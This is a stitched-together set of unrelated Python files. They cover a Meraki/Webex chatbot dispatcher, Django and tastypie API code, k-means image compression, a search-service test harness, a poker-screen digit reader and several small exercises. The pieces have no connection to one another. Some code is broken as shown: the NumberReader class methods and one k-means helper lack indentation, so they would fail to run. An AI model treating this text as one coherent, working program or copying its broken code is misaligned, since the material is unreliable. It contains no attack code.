    # NOTE(review): action_builder is only set True in the Webex branch; if
    # only the Meraki service is enabled this still returns False even though
    # actions were registered — confirm that is intended.
    action_builder = False
    if webex_teams_enable():
        dispatcher.add_action(
            "webex-health", "Get Health of Webex Teams Link", get_health
        )
        dispatcher.add_action("send-card", "Send Meraki Form", send_card)
        dispatcher.add_action("simple-card", "Adaptive Card Simple form", simple_card)
        action_builder = True
    # Meraki Service
    if meraki_api_enable():
        # Worker bound to the requester so Meraki changes are attributable.
        mki = APIGWMerakiWorker(requestor_name)
        dispatcher.add_action(
            "show-network",
            "Summary Info of Managed Meraki Network",
            mki.show_meraki_network
        )
        dispatcher.add_action(
            "show-vlans",
            "Display a List with the VLANS attached to the Meraki Network",
            mki.show_meraki_vlans
        )
        dispatcher.add_action(
            "show-switch",
            "Display a List with the Switches attached to the Meraki Network",
            mki.show_meraki_switch
        )
        dispatcher.add_action(
            "change-port",
            "Parameters: Switch IP, Switch-Port, Vlan-ID ie _change-port 1.1.1.1 10 101_",
            mki.change_port_vlan
        )
        dispatcher.add_action(
            "activate-ssid",
            "Parameters: SSID Name, ie _activate-ssid SSIDName_",
            mki.activate_new_ssid
        )
        dispatcher.add_action(
            "show-ssid",
            "Parameters: Display a List of All Enabled SSIDs",
            mki.show_meraki_ssid
        )
        dispatcher.add_action(
            "remove-ssid",
            "Parameters: Remove and Disable a SSIDs by name or Number ID ie _remove-ssid <SSID NAME> | <SSID NUMBER 1 to 15>_",
            mki.remove_ssid
        )
        dispatcher.add_action(
            "show-ports",
            "Parameters: Display All Ports in a Switch _show-ports <Switch IP>_",
            mki.show_meraki_ports
        )
        dispatcher.add_action(
            "show-mx-ports",
            "Parameters: Display All Ports in a MX appliance _show-mx-ports_",
            mki.show_meraki_mx_ports
        )
        dispatcher.add_action(
            "disable-port",
            "Parameters: Deactivate Switch Port _diasble-port <IP_ADDR> <PORT_ID>_",
            mki.deactivate_port
        )
    # Sample Service — always registered, regardless of the flags above.
    covid = CovidStats()
    dispatcher.add_action(
        "covid-info", "Latest-Covid Information", covid.get_covid_summary
    )
    return action_builder
from rest_framework import serializers
from ebooks.models import Ebook, Review
class ReviewSerializer(serializers.ModelSerializer):
    """Serializes Review objects; the author renders via str() and the
    owning ebook FK is omitted (implied by the nested context)."""
    # Read-only string representation of the review's author.
    review_author = serializers.StringRelatedField(read_only=True)

    class Meta:
        model = Review
        exclude = ("ebook",)
        # fields = "__all__"
class EbookSerializer(serializers.ModelSerializer):
    """Serializes Ebook objects with all related reviews nested read-only."""
    # Inline, read-only list of the ebook's reviews.
    reviews = ReviewSerializer(many=True, read_only=True)

    class Meta:
        model = Ebook
        fields = "__all__"
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @Time : 2021/4/8 19:07
# @Author :'liuyu'
# @Version:V 0.1
# @File :
# @desc :
import pandas as pd
from pandas import read_parquet
def verify_product(path):
    """Load the product parquet dataset and print basic sanity info
    (per-column non-null counts and the first rows)."""
    data = read_parquet(path)
    print(data.count())
    # Bug fix: head() just returns a DataFrame; outside a REPL the bare
    # expression was a no-op, so the preview must be printed explicitly.
    print(data.head())
def verify_user(path):
    """Load the user parquet dataset and print per-column non-null counts."""
    user_df = read_parquet(path)
    print(user_df.count())
if __name__ == '__main__':
    # Smoke-check the generated product dataset.
    path1 = "../chapter10/myCollaborativeFilter/data/product"
    verify_product(path1)
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from skimage import io
# Load the image, normalize RGB to [0, 1], and flatten to (pixels, channels).
pic = io.imread("./data/bird_small.png") / 255.
io.imshow(pic)
print(pic.shape)
data = pic.reshape(128 * 128, 3)  # NOTE(review): assumes a 128x128 image
def k_means(data, k, epoch=100, n_init=10):
    """Run k-means *n_init* times from random inits and keep the best run.

    Args:
        data (pd.DataFrame): samples, one row per observation.
        k (int): number of clusters.
        epoch (int): max iterations per run.
        n_init (int): number of random restarts.
    Returns:
        (C, centroids, least_cost) from the lowest-cost run.
    """
    # Bug fix: building np.array over (C, centroids, cost) tuples creates a
    # ragged object array, which raises ValueError on NumPy >= 1.24; picking
    # the minimum-cost run directly avoids the array entirely.
    runs = [_k_means_iter(data, k, epoch) for _ in range(n_init)]
    return min(runs, key=lambda run: run[-1])
def combine_data_C(data, C):
    """Return a copy of *data* with cluster assignments in a new 'C' column."""
    labeled = data.copy()
    labeled['C'] = C
    return labeled
def random_init(data, k):
    """Choose k distinct rows of the data set as initial centroids.

    Args:
        data: DataFrame
        k: int
    Returns:
        ndarray of shape (k, n_features)
    """
    chosen = data.sample(n=k)
    return chosen.values
def _find_your_cluster(x, centroids):
"""find the right cluster for x with respect to shortest distance
Args:
x: ndarray (n, ) -> n features
centroids: ndarray (k, n)
Returns:
k: int
"""
distances = np.apply_along_axis(func1d=np.linalg.norm, # this give you l2 norm
axis=1,
arr=centroids - x) # use ndarray's broadcast
return np.argmin(distances)
def assign_cluster(data, centroids):
    """Assign every row of *data* to its nearest centroid.

    Returns:
        ndarray C of cluster indices, one per row of data.
    """
    assignments = [_find_your_cluster(row, centroids) for row in data.values]
    return np.array(assignments)
def new_centroids(data, C):
    """Recompute each cluster's centroid as the mean of its members."""
    labeled = combine_data_C(data, C)
    cluster_means = labeled.groupby('C', as_index=False).mean()
    return cluster_means.sort_values(by='C').drop('C', axis=1).values
def cost(data, centroids, C):
    """Mean l2 distance of every sample to its assigned centroid."""
    n_samples = data.shape[0]
    # Fancy-indexing expands C into one centroid row per sample.
    assigned_centroids = centroids[C]
    distances = np.linalg.norm(data.values - assigned_centroids, axis=1)
    return distances.sum() / n_samples
def _k_means_iter(data, k, epoch=100, tol=0.0001):
    """Single k-means run from one random init, with early stopping.

    Stops once the relative cost improvement drops below *tol*.
    Returns (C, centroids, final_cost).
    """
    centroids = random_init(data, k)
    cost_progress = []
    for i in range(epoch):
        print('running epoch {}'.format(i))
        C = assign_cluster(data, centroids)
        centroids = new_centroids(data, C)
        cost_progress.append(cost(data, centroids, C))
        # Early break once the relative improvement is below tolerance.
        if len(cost_progress) > 1 and \
                abs(cost_progress[-1] - cost_progress[-2]) / cost_progress[-1] < tol:
            break
    return C, centroids, cost_progress[-1]
# Run our implementation (small epoch/n_init for speed) and show the result.
# NOTE(review): this rebinds 'cost' from the function above to a float,
# shadowing it for the rest of the script.
C, centroids, cost = k_means(pd.DataFrame(data), 16, epoch=10, n_init=3)
compressed_pic = centroids[C].reshape((128, 128, 3))
fig, ax = plt.subplots(1, 2)
ax[0].imshow(pic)
ax[1].imshow(compressed_pic)
plt.show()
# Same compression with scikit-learn's KMeans for comparison.
from sklearn.cluster import KMeans
# NOTE(review): n_jobs was removed from KMeans in scikit-learn 0.25+ —
# confirm the pinned version.
model = KMeans(n_clusters=16, n_init=100, n_jobs=-1)
model.fit(data)
centroids = model.cluster_centers_
print(centroids.shape)
C = model.predict(data)
print(C.shape)
print(centroids[C].shape)
compressed_pic = centroids[C].reshape((128, 128, 3))
fig, ax = plt.subplots(1, 2)
ax[0].imshow(pic)
ax[1].imshow(compressed_pic)
plt.show()
# Module-level configuration constants.
# NOTE(review): meanings are undocumented here — N and L appear to be
# topology parameters used alongside NUM_SWITCHES; confirm against the
# importing code.
N = 6
L = 1
NUM_SWITCHES = 49
|
#!/usr/bin/python
# Minimal Tkinter (Python 2) demo window: a text box plus a slider.
from Tkinter import *

w = Tk()  # main application window
text = Text(w)
# NOTE(review): despite its name, this is a Scale (slider) widget,
# not a Scrollbar.
scrollbar = Scale(w, from_=0, to=5)
# Code to add widgets
text.insert(INSERT, "git gud skrub")
text.pack()
scrollbar.pack()
w.mainloop() #Main Window
|
# -*- coding: utf-8 -*-
# Copyright (C) 2018 by
# David Amos <somacdivad@gmail.com>
# Randy Davila <davilar@uhd.edu>
# BSD license.
#
# Authors: David Amos <somacdivad@gmail.com>
# Randy Davila <davilar@uhd.edu>
"""Function for computing the triameter of a graph.
"""
from itertools import combinations

import grinpy as gp

# Public API of this module.
__all__=['triameter']
def triameter(G):
    r"""Returns the triameter of the graph G with at least 3 nodes.

    The *triameter* of a graph G with vertex set *V* is defined as the
    following maximum value

    .. math::
        \max\{d(v,w) + d(w,z) + d(v,z): v,w,z \in V\}

    Parameters
    ----------
    G : NetworkX graph
        An undirected, connected graph with order at least 3.

    Returns
    -------
    int
        The triameter of the graph G.

    Examples
    --------
    >>> G = nx.cycle_graph(5)
    >>> triameter(G)
    6

    References
    ----------
    A. Das, The triameter of graphs, ArXiv preprint arXiv:1804.01088, 2018.
    https://arxiv.org/pdf/1804.01088.pdf
    """
    best = 0
    for v, w, z in combinations(G.nodes(), 3):
        # Bug fix: shortest_path returns the list of NODES on the path, so
        # its length is distance + 1; the old code summed raw lengths and
        # therefore always reported triameter + 3. Subtract 1 per leg.
        d1 = len(gp.shortest_path(G, source=v, target=w)) - 1
        d2 = len(gp.shortest_path(G, source=w, target=z)) - 1
        d3 = len(gp.shortest_path(G, source=v, target=z)) - 1
        best = max(best, d1 + d2 + d3)
    return best
|
# Given a square matrix mat, return the sum of the matrix diagonals.
#
# Only include the sum of all the elements on the primary diagonal
# and all the elements on the secondary diagonal
# that are not part of the primary diagonal.
class Solution:
    def diagonalSum(self, mat):
        """Return the sum of both diagonals of square matrix *mat*,
        counting the center element only once when the size is odd.
        """
        n = len(mat)
        # Primary diagonal (i, i) plus secondary diagonal (i, n-1-i) in one
        # O(n) pass — the old numpy identity-matrix trick did O(n^2) work
        # and pulled in numpy for nothing.
        total = sum(mat[i][i] + mat[i][n - 1 - i] for i in range(n))
        if n % 2 == 1:
            # For odd n the center cell lies on both diagonals and was
            # counted twice above.
            total -= mat[n // 2][n // 2]
        return total
if __name__ == '__main__':
    # Quick smoke test: both diagonals of a 3x3 matrix, center counted once.
    test_input = [[1, 2, 3],
                  [4, 5, 6],
                  [7, 8, 9]]
    print(Solution().diagonalSum(test_input))
def drawpoly(myturtle, sides, length):
    """Draw a regular polygon with *sides* edges of *length* using *myturtle*."""
    angle = 360 / sides  # exterior angle turned before each edge
    for _ in range(sides):
        myturtle.right(angle)
        myturtle.forward(length)
from turtle import *

# Interactive driver: read polygon parameters and draw on a new turtle.
n=int(input("number of sides>>"))
s=int(input("length of sides>>"))
t=Turtle()
drawpoly(t,n,s)
|
#coding=utf-8
import json
import sys # 导入sys模块,用于引入thrift生成的文件
import xlrd
# NOTE(review): Python 2-only hack to force UTF-8 as the default codec;
# it has no equivalent (and is unnecessary) on Python 3.
reload(sys)
sys.setdefaultencoding('utf8')
#print os.path.abspath('..\\searchClient')
# Make the Thrift client package importable from a sibling checkout.
sys.path.append("../searchClient")
#sys.path.append(r'''E:\AutoTestInterface\search-service''')
from lib.Client import Client
#from searchClient.lib.Client import Client
from xlwt import Style
from xlutils.copy import copy
# Thrift-generated code lives in ../gen-py.
sys.path.append('../gen-py')
class NewestLibrary(object):
    """Keyword library (Python 2) that drives the search service over Thrift
    and validates JSON responses against Excel-driven test cases."""

    def __init__(self):
        # Raw JSON string of the most recent service response.
        self._result=''

    def get_dataTable(self,sheetName):
        """Load case names, request payloads and expected results from one
        sheet of the Excel case file."""
        data = xlrd.open_workbook(r'../testcases/case.xls') # open the Excel workbook
        table = data.sheet_by_name(sheetName) # fetch the sheet by name
        # Column 0/1/2, skipping the header row.
        self.caseName = table.col_values(0, 1)
        self.testData = table.col_values(1, 1)
        self.exceptResult = table.col_values(2, 1)
        self.sheetName=sheetName

    def get_TestData(self,dataType):
        """Return one of the three loaded columns by name."""
        if dataType=='caseName':
            return self.caseName
        elif dataType=='testData':
            return self.testData
        elif dataType=='exceptResult':
            return self.exceptResult
        else:
            raise AssertionError('There is no %s ' % (dataType))

    def excu_search_v4(self,params):
        """Call getSearchData_v4 with a JSON params string; store the raw
        response in self._result."""
        print(params)
        print(type(params))
        self.caseParam = params
        client = Client('172.20.17.67', 9090).setClass('Search').setMethod('getSearchData_v4').getApi() # connect to the server
        params = params.encode('utf-8')
        result = client.getSearchData_v4(params)# invoke the interface
        self._result=result
        #print("res:%s",(self._result))

    def excu_search_v3(self,params):
        """Call the v3 store-search endpoint; store the raw response."""
        print(params)
        self.caseParam = params
        client = Client('172.20.17.67', 9090).setClass('Search').setMethod('getSearchStore_v3').getApi() # connect to the server
        params = params.encode('utf-8')
        # NOTE(review): the method was set to 'getSearchStore_v3' above but
        # this still invokes getSearchData_v4 — looks like a copy/paste slip;
        # confirm which endpoint is intended.
        result = client.getSearchData_v4(params)# invoke the interface
        print(result)
        self._result=result

    def _resultToPython(self):
        """Parse the stored JSON response and return the entry keyed by the
        search word computed in _setSearchWord()."""
        #self._setSearchWord(self.caseParam)
        json_to_python = json.loads(self._result)
        result = json_to_python[self.searchWord]
        return result

    # Check every product entry inside the response 'rows'.
    def result_check(self,excepted,sheetName):
        """Assert that every returned row satisfies the expected-result spec
        (*excepted*); raises AssertionError on the first failing row."""
        self._setSearchWord()
        result = self._resultToPython()
        # Response is empty
        print "result type:%s" %(type(result))
        print "excepted type:%s,excepted:%s" %(type(excepted),excepted)
        if result == False:
            if excepted == 0:
                print("22222222222")
                pass
            else:
                print("3333333333")
                raise AssertionError("except is not same as result!!%s%s" %(type(excepted),excepted))
        else:
            if excepted == 1:
                print("1111")
                pass
            else:
                # Products were returned: validate each row in turn.
                for i in range(0,len(result.values()[2].get('rows'))):
                    print("row_size:%d") %(len(result.values()[2].get('rows')))
                    itemResult = result.values()[2].get('rows')[i]
                    itemRes = self.result_should_be(excepted, itemResult, sheetName)
                    if itemRes == False:
                        print "1111111111111111111111111111111111111111111111111111"
                        raise AssertionError("result[%d] cannot pass the case" %(i))

    # Compare the expected spec against one actual row.
    def result_should_be(self, excepted, itemResult, sheetName):
        """Return True when *itemResult* matches the expected spec."""
        defaultRes = False
        exitResult = 0
        # v2 complex data, e.g. {"1":{"a":"AA"},"2":{"b":"BB","c":"CC"}};
        # the outer keys ("1", "2") are OR-ed together.
        if sheetName.strip().startswith('extend_v4'):
            # NOTE(review): eval on spreadsheet content — safe only for
            # trusted test data.
            excepteds = eval(excepted.encode("utf-8"))
            keylist = excepteds.keys()
            print('aaaaaa:')
            keylist.sort()
            for i in keylist:
                exp = str(excepteds[i]).replace('\'','\"')
                print(exp)
                resultNum = self._comparaResult(exp,itemResult)
                exitResult += resultNum
        else:
            # v1 simple data, e.g. {"a":"AA","b":"BB|CC"}; keys are AND-ed.
            print('bbbbbbbb:')
            exitResult = self._comparaResult(excepted, itemResult)
        if exitResult >0:
            defaultRes = True
        return defaultRes

    def _comparaResult(self,expected,result):
        """Return 1 when *result* satisfies the JSON spec *expected*, else 0."""
        if expected == False:
            return 0
        else:
            print('999999--')
            expectDict = json.loads(expected)
            print expectDict
            print type(expectDict)
            expectKeys = list(expectDict.keys()) # keys of the expected result
            expectValues = expectDict.values() # values of the expected result
            for i in range(0, len(expectKeys)):
                print 'len:%d' %(len(expectKeys))
                expectKey = expectKeys[i]
                if result.has_key(expectKey):
                    realValue = result.get(expectKey)
                else:
                    # Missing keys are skipped rather than failed.
                    continue
                judge = False
                # Also handle documents whose value is a list.
                if(isinstance(realValue,list)):
                    print('111111')
                    for j in range(0,len(realValue)):
                        print "realvalue:%s" %(realValue[j])
                        judgeItem = self._isinlist(realValue[j],expectValues[i].split('|'))
                        if judgeItem == True:
                            judge = True
                            break
                        else:
                            pass
                else:
                    # A leading '-' in the expected value flags an exclusion.
                    if(expectValues[i].find('-')== -1):
                        print ("hellloooo")
                        judge = self._isinlist(realValue, expectValues[i].split('|'))
                    else:
                        print ("world~~~,%s,%s" % (expectValues[i][1:],realValue))
                        judge = self._exceptlist(realValue,expectValues[i])
                    print(judge)
                if judge == False:
                    return 0
            return 1

    def _isinlist(self,realValue, lists):
        """True when realValue equals any entry of *lists* ('|'-split
        alternatives), comparing ints numerically."""
        lens = len(lists)
        #print 'real:%d' %(realValue)
        #print 'type:%s,expect:%s' %(lists[0],type(lists[0]))
        #print 'listlen:%d' %(lens)
        returnres = False
        for i in range(0,lens):
            if realValue == lists[i]:
                return True
            elif isinstance(realValue,int):
                if realValue == int(lists[i]):
                    return True
                else:
                    returnres = False
            else:
                returnres = False
        return returnres

    def _exceptlist(self,realValue,strs):
        """True when realValue differs from the exclusion spec string."""
        if realValue != strs:
            print ("asssssss")
            return True
        else:
            print ("zzzzz")
            return False

    def _setSearchWord(self):
        """Derive the top-level response key (the effective search word)
        from the request params, preferring any spell-corrected keyword."""
        params = self.caseParam
        #.encode('utf-8') # unicode -> str
        # Extract the keyword.
        res = json.loads(self._result)
        if json.loads(params).has_key("search"):
            if res.has_key("correct_keyword"):
                search_word = res["correct_keyword"]
            else:
                search_word = json.loads(params)["search"]
        else:
            search_word = ''
        self.searchWord = search_word

    def _setExceptedResult(self,index):
        # Select the expected result for the case at *index*.
        self.excepted=self.exceptResult[index]

    def page_check(self,excepted):
        """Assert paging fields in response['data'] match the expected JSON
        (values compared as ints)."""
        self._setSearchWord()
        result = self._resultToPython()
        exceptedKeys = json.loads(excepted).keys()
        exceptedValues = json.loads(excepted).values()
        for i in range(0,len(exceptedKeys)):
            print(result["data"].get(exceptedKeys[i]))
            realValue = result["data"].get(exceptedKeys[i])
            exceptedValue_int = int(exceptedValues[i].encode())
            if realValue != exceptedValue_int:
                print("1111")
                raise AssertionError("not pass the case!")
if __name__ == '__main__':
    # Ad-hoc manual run: fire one v4 search and validate the response.
    test=NewestLibrary()
    #test.get_dataTable('basic_v4')
    #test.get_dataTable()
    test.excu_search_v4('{"search_type":0,"rows_per_page":100,"pre":1}')
    test.result_check('TRUE','basic_v4')
    '''
    test.excu_search_v4('{"search_type":0,"category_id":[508,507,509]}')
    test.result_check('{"{"category_id_4":"509"}','basic_v4')
    '''
    #test.excu_search_v4('{"search_type":0,"category_id":[508,507,509]}')
    #test.excu_search_v4('{"search_type": 0,"search":"ysld","proposeAutoCorrect":0}')
    #test.result_check('FALSE','basic_v4')
    #test.excu_search_v4('{"rows_per_page": 100,"search":"口红 "}')
    #test.page_check('{"pageNumber":"1"}')
from tastypie.resources import ModelResource
from tastypie.authentication import Authentication
from tastypie.authorization import Authorization
import models
class TestResource(ModelResource):
    """Tastypie REST resource exposing all Test objects.

    NOTE(review): Authentication() and Authorization() are the permissive
    base classes — every request is allowed; confirm this is intended
    outside of development.
    """
    class Meta:
        queryset = models.Test.objects.all()
        authorization = Authorization()
        authentication = Authentication()
# import the necessary packages
import os
import logging
from configuration import Config as cfg
from card_util import get_game_area_as_2d_array, rgb_yx_array_to_grayscale, \
find_contours, diff_polygons, display_image_with_contours, timeit
import numpy as np
# Module loggers: one for normal flow, one for very verbose tracing.
logger = logging.getLogger(__name__)
trace_logger = logging.getLogger(__name__ + "_trace")
class NumberReader(object):
def __init__(self):
    # (digit, contour) training pairs built from the two reference images.
    self.training_data = []
    # Reference image with digits 1-6; -1 marks the trailing '$' glyph
    # (filtered out when digits are joined into an integer).
    self.train_numbers(file_path=os.path.join(cfg.NUMBER_DATA_PATH, 'numbers_1_to_6.png'),
                       hero_numbers=[1, 2, 3, 4, 5, 6, -1])
    # Reference image with digits 6,7,8,9,0 plus the '$' glyph (-1).
    self.train_numbers(file_path=os.path.join(cfg.NUMBER_DATA_PATH, 'numbers_6_to_0.png'),
                       hero_numbers=[6, 7, 8, 9, 0, -1])
def train_numbers(self, file_path, hero_numbers):
    """Build training pairs by matching digit contours found in a reference
    screenshot (sorted left-to-right) with the labels in *hero_numbers*."""
    image_array = get_game_area_as_2d_array(file_path)
    # display_image_with_contours(image_array, [])
    hero_bet_array = cfg.HERO_BETTING_AREA.clip_2d_array(image_array)
    hero_bet_grey_array = rgb_yx_array_to_grayscale(hero_bet_array)
    # Binarize bright pixels so contour detection sees crisp glyphs.
    hero_bet_grey_array[hero_bet_grey_array >= 121] = 255
    contour_list = find_contours(grey_array=hero_bet_grey_array,
                                 **cfg.OTHER_PLAYER_BET_CONTOUR_CONFIG
                                 )
    # Left-to-right contour order must match the order of hero_numbers.
    sorted_contours = sorted(contour_list, key=lambda x: x.bounding_box.min_x)
    # display_image_with_contours(hero_bet_grey_array, [c.points_array for c in sorted_contours])
    self.training_data.extend(zip(hero_numbers, sorted_contours))
def _digit_contours_to_integer(self, digit_contours):
    """Classify each digit contour against the training data and join the
    digits into an int; returns None when no digits were recognized."""
    digit_contours = sorted(digit_contours, key=lambda x: x.bounding_box.min_x)
    numbers_found = []
    for digit_index, digit_contour in enumerate(digit_contours):
        if digit_index > 0 and digit_contours[digit_index - 1].polygon.contains(digit_contour.polygon):
            # Catch inner circle of 0s
            continue
        # Nearest-neighbour match: the training glyph with the smallest
        # polygon difference wins.
        card_diffs = [diff_polygons(digit_contour, t[1]) for t in self.training_data]
        idx = np.argmin(card_diffs, axis=0)
        numbers_found.append(self.training_data[idx][0])
    logger.debug(f"Numbers found: {numbers_found}")
    # Last number will be the $
    numbers_found = numbers_found[0:-1]
    this_bet_value = None
    if numbers_found:
        # -1 entries are '$' glyphs; keep real digits only.
        this_bet_value = int("".join([str(n) for n in numbers_found if n >= 0]))
    return this_bet_value
def get_starting_pot(self, game_area_image_array):
    """Read the starting pot value from the pot area of the screenshot;
    returns 0 when no digits are recognized."""
    pot_image_array = cfg.STARTING_POT_AREA.clip_2d_array(game_area_image_array)
    pot_image_grey_array = rgb_yx_array_to_grayscale(pot_image_array)
    digit_contours = find_contours(grey_array=pot_image_grey_array,
                                   **cfg.POT_CONTOUR_CONFIG,
                                   display=False
                                   )
    digit_contours = list(digit_contours)
    # display_image_with_contours(pot_image_grey_array, [c.points_array for c in digit_contours])
    starting_pot_value = self._digit_contours_to_integer(digit_contours)
    # display_image_with_contours(pot_image_grey_array, [digit_contours[2].points_array] +
    #
    # [x[1].points_array for x in self.training_data if x[0] in [9,0]])
    if starting_pot_value is None:
        # No readable digits: treat as an empty pot.
        starting_pot_value = 0
    return starting_pot_value
@timeit
def get_hero_chips_remaining(self, game_area_image_array):
    """Read the hero's remaining chip count from the screenshot.

    Digits render tightly grouped, so digit-group contours are found first,
    separator columns are inserted between digits, and the per-digit
    contours are then classified. May return None when nothing is readable.
    """
    chips_image_array = cfg.HERO_REMAINING_CHIPS_AREA.clip_2d_array(game_area_image_array)
    #display_image_with_contours(chips_image_array, contours=[])
    chips_image_grey_array = rgb_yx_array_to_grayscale(chips_image_array)
    digit_group_contours = find_contours(grey_array=chips_image_grey_array,
                                         **cfg.CHIPS_REMAINING_DIGIT_GROUPS_CONTOUR_CONFIG,
                                         display=False
                                         )
    digit_group_contours = list(digit_group_contours)
    if False:  # debug visualization, disabled
        display_image_with_contours(chips_image_grey_array,
                                    [c.points_array for c in digit_group_contours])
    # Separate the touching digits so each yields its own contour.
    chips_image_grey_array = self.add_spaces_to_digits(
        image_grey_array=chips_image_grey_array,
        digit_group_contours=digit_group_contours
    )
    digit_contours = find_contours(grey_array=chips_image_grey_array,
                                   **cfg.CHIPS_REMAINING_DIGIT_CONTOUR_CONFIG,
                                   display=False
                                   )
    digit_contours = list(digit_contours)
    chips_remaining = self._digit_contours_to_integer(digit_contours)
    logger.info(f"Chips remaining: {chips_remaining}")
    if False:  # debug visualization, disabled
        display_image_with_contours(chips_image_grey_array,
                                    [c.points_array for c in digit_contours])
    return chips_remaining
def add_spaces_to_digits(self, image_grey_array, digit_group_contours, digit_width=5, fill_color=0):
    """Insert blank separator columns between digits so that each digit
    produces its own contour on the next find_contours pass.

    Args:
        image_grey_array: 2-D grayscale image (y, x).
        digit_group_contours: contours of digit groups, left-to-right.
        digit_width: assumed digit width in pixels.
        fill_color: pixel value of the inserted separator columns.
    Returns:
        The image with separator columns inserted (or unchanged when there
        are not enough digit groups to work with).
    """
    if digit_group_contours is None or len(digit_group_contours) <= 1:
        logger.warning("Not enough digit groups")
        # Bug fix: the bare 'return' handed None to callers that pass the
        # result straight to find_contours; return the image unchanged.
        return image_grey_array
    right_x = np.max(digit_group_contours[-1].points_array[:, 1])
    left_dollar_sign = np.min(digit_group_contours[-1].points_array[:, 1])
    left_x = np.min(digit_group_contours[0].points_array[:, 1])
    if digit_width == 6:
        right_x = int(round(right_x+0.4))
    else:
        right_x = int(round(right_x))
    left_x = int(round(left_x))
    if right_x-left_dollar_sign > 2*digit_width:
        # we didn't actually detect a $ sign, so we just assume the right most group are 3 digits
        x_to_insert_blank_line = right_x
    else:
        # account for the $ sign and an extra space
        x_to_insert_blank_line = right_x - digit_width - 1
    seps_added = 0
    # Walk right-to-left inserting one separator column per digit width.
    while x_to_insert_blank_line > left_x:
        image_grey_array = np.insert(image_grey_array, obj=x_to_insert_blank_line,
                                     values=fill_color, axis=1)
        x_to_insert_blank_line -= digit_width
        seps_added += 1
        # each group of 3 gets an extra space
        if seps_added % 3 == 0:
            if digit_width == 6:
                x_to_insert_blank_line -= 3
            else:
                x_to_insert_blank_line -= 1
    return image_grey_array
    @timeit
    def get_bets(self, game_area_image_array):
        """Read each player's current bet from the game-area screenshot.

        The bet "bubbles" are green, so the green channel is isolated via
        channel arithmetic, each bubble is assigned to a seat from its
        position relative to the centre of the bet area, and the digits
        inside the bubble are OCR'd into an integer.

        :param game_area_image_array: colour image array (rows, cols, channels).
        :return: list of 5 bet values indexed by player position; positions
            with no readable bet stay 0.
        """
        bet_image_array = cfg.BETS_AREA.clip_2d_array(game_area_image_array)
        #display_image_with_contours(bet_image_array, [])
        # get just green component
        # display_image_with_contours(bet_image_array, [])
        # Basically we just want green things, so...
        # take max of red and blue columns (indexs 0 and 2)
        max_red_blue_value = np.max(bet_image_array[:, :, [0, 2]], axis=2)
        # build a boolean array of green values that are less than the max of red or blue
        cond = bet_image_array[:, :, 1] < max_red_blue_value
        # for those pixels where green not the max, set it to 0, otherwise subtract the max
        bet_image_array[:, :, 1] = np.where(cond, 0, bet_image_array[:, :, 1] - max_red_blue_value)
        # now we just have a picture of green things
        image_array = bet_image_array[:, :, 1].copy()
        bet_bubbles = find_contours(grey_array=image_array,
                                    min_width=30,
                                    max_width=100,
                                    min_height=9,
                                    # Sometimes green chips can make height larger
                                    max_height=35,
                                    display=False
                                    )
        # left-to-right order keeps seat assignment below deterministic
        bet_bubbles = sorted(bet_bubbles, key=lambda x: x.bounding_box.min_x)
        #display_image_with_contours(image_array, [b.points_array for b in bet_bubbles])
        all_bets = [0] * 5
        center_bet_area_yx = bet_image_array.shape[0] / 2, bet_image_array.shape[1] / 2
        for contour in bet_bubbles:
            # logger.info(contour.bounding_box)
            just_text = contour.bounding_box.clip_2d_array(image_array)
            # offset (y, x) of this bubble's centre from the bet-area centre
            center_bet_yx = list(contour.bounding_box.center_yx())
            center_bet_yx[0] -= center_bet_area_yx[0]
            center_bet_yx[1] -= center_bet_area_yx[1]
            player_position = None
            # Map the offset to a seat: a bubble close to the vertical centre
            # line is position 0, otherwise one of the four quadrants.
            if abs(center_bet_yx[0]) < 75 and abs(center_bet_yx[1]) < 15:
                player_position = 0
            elif center_bet_yx[0] > 0 and center_bet_yx[1] < 0:
                player_position = 1
            elif center_bet_yx[0] < 0 and center_bet_yx[1] < 0:
                player_position = 2
            elif center_bet_yx[0] < 0 and center_bet_yx[1] > 0:
                player_position = 3
            elif center_bet_yx[0] > 0 and center_bet_yx[1] > 0:
                player_position = 4
            else:
                # offset fell exactly on an axis - no quadrant matched
                raise Exception("cain")
            # clip off 4 leftmost pixels which are giving false contours
            just_text_grey_array = just_text[:, 4:]
            digit_group_contours = find_contours(grey_array=just_text_grey_array,
                                                 **cfg.OTHER_PLAYER_BET_DIGIT_GROUP_CONFIG,
                                                 display=False
                                                 )
            digit_group_contours = list(digit_group_contours)
            #display_image_with_contours(just_text_grey_array, [c.points_array for c in digit_group_contours])
            # widen the image so every digit becomes a separate contour
            bet_image_grey_array = self.add_spaces_to_digits(
                image_grey_array=just_text_grey_array,
                digit_group_contours=digit_group_contours,
                digit_width=6,
                fill_color=255
            )
            digit_contours = find_contours(grey_array=bet_image_grey_array,
                                           **cfg.OTHER_PLAYER_BET_CONTOUR_CONFIG,
                                           display=False
                                           )
            digit_contours = list(digit_contours)
            # display_image_with_contours(bet_image_grey_array, [c.points_array for c in digit_contours])
            this_bet_value = self._digit_contours_to_integer(digit_contours)
            if this_bet_value is not None:
                logger.info(f"Found bet {this_bet_value}. Players position: {player_position}")
                logger.debug(
                    "Bet area center: {}. Bet center: {} ".format(
                        center_bet_area_yx,
                        center_bet_yx))
                #display_image_with_contours(bet_image_grey_array, [c.points_array for c in digit_contours])
                all_bets[player_position] = this_bet_value
        return all_bets
|
def read_out(acrostic):
    """Return the word hidden in *acrostic*: the first letter of each line."""
    return "".join(word[0] for word in acrostic)
'''
An acrostic is a text in which the first letter of each line spells out a word.
It is also a quick and cheap way of writing a poem for somebody, as exemplified below:
Write a program that reads an acrostic to identify the "hidden" word. Specifically,
your program will receive a list of words (representing an acrostic) and will need
to return a string corresponding to the word that is spelled out by taking the first
letter of each word in the acrostic.
'''
|
# Generated by Django 3.1.5 on 2021-01-22 13:10
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Add upload metadata (timestamp and uploader name) to the video model."""
    dependencies = [
        ('processer', '0003_remove_video_firstframe'),
    ]
    operations = [
        migrations.AddField(
            model_name='video',
            name='upload_at',
            # pre-existing rows get the migration time as their upload time
            field=models.DateTimeField(default=django.utils.timezone.now),
        ),
        migrations.AddField(
            model_name='video',
            name='upload_by',
            field=models.CharField(default='', max_length=150),
        ),
    ]
|
# Read a score (0-100) from the user and print the letter grade.
score = int(input('请输入你的分数(0-100)'))
# The elif chain already guarantees the upper bound of each band.
if score >= 90:
    print('A')
elif score >= 80:
    print('B')
elif score >= 70:
    print('C')
elif score >= 60:
    print('D')
elif score >= 0:
    print('E')
else:
    print('输入错误')
|
#!/usr/bin/env python
